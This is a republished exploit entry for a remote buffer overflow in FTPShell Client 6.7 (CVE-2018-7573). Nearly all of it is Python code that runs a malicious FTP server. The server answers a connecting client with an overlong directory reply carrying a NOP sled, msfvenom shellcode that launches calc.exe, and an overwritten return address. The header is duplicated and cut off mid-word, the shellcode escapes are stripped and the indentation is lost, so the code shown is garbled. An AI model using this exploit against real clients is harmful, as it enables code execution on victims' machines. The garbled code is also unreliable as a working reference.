FTPShell Client 6.7 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 755

# -*- coding: utf-8 -*-

# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow
# Date: 2018-01-03
# Exploit Author: SebastiA!n Castro @r4wd3r
# Vendor Hom # -*- coding: utf-8 -*-

# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow
# Date: 2018-01-03
# Exploit Author: SebastiA!n Castro @r4wd3r
# Vendor Homepage: http://www.ftpshell.com/index.htm
# Software Link: http://www.ftpshell.com/download.htm
# Version: 6.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows XP SP3 x86.
# CVE : CVE-2018-7573

import socket
import sys

port = 21

# msfvenom -p windows/exec CMD=calc.exe -f python -b 'x00x22x0dx0a'
buf = ""
buf += "xdbxc8xbax3ex93x15x8fxd9x74x24xf4x5ex33"
buf += "xc9xb1x31x31x56x18x03x56x18x83xc6x3ax71"
buf += "xe0x73xaaxf7x0bx8cx2ax98x82x69x1bx98xf1"
buf += "xfax0bx28x71xaexa7xc3xd7x5bx3cxa1xffx6c"
buf += "xf5x0cx26x42x06x3cx1axc5x84x3fx4fx25xb5"
buf += "x8fx82x24xf2xf2x6fx74xabx79xddx69xd8x34"
buf += "xdex02x92xd9x66xf6x62xdbx47xa9xf9x82x47"
buf += "x4bx2exbfxc1x53x33xfax98xe8x87x70x1bx39"
buf += "xd6x79xb0x04xd7x8bxc8x41xdfx73xbfxbbx1c"
buf += "x09xb8x7fx5fxd5x4dx64xc7x9exf6x40xf6x73"
buf += "x60x02xf4x38xe6x4cx18xbex2bxe7x24x4bxca"
buf += "x28xadx0fxe9xecxf6xd4x90xb5x52xbaxadxa6"
buf += "x3dx63x08xacxd3x70x21xefxb9x87xb7x95x8f"
buf += "x88xc7x95xbfxe0xf6x1ex50x76x07xf5x15x88"
buf += "x4dx54x3fx01x08x0cx02x4cxabxfax40x69x28"
buf += "x0fx38x8ex30x7ax3dxcaxf6x96x4fx43x93x98"
buf += "xfcx64xb6xfax63xf7x5axd3x06x7fxf8x2b"

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(5)
print("[+] FTP server started on port: "+str(port)+" ")
except:
print("[x] Failed to start the server on port: "+str(port)+" ")

eip = "xedx2ex45" # CALL ESI from FTPShell.exe : 0x00452eed
nops = "x90"*40
junk = "F"*(400 - len(nops) - len(buf))
payload = nops + buf + junk + eip

while True:
conn, addr = s.accept()
conn.send('220 FTP Server ')
print(conn.recv(1024))
conn.send("331 OK ")
print(conn.recv(1024))
conn.send('230 OK ')
print(conn.recv(1024))
conn.send('220 "'+payload+'" is current directory ')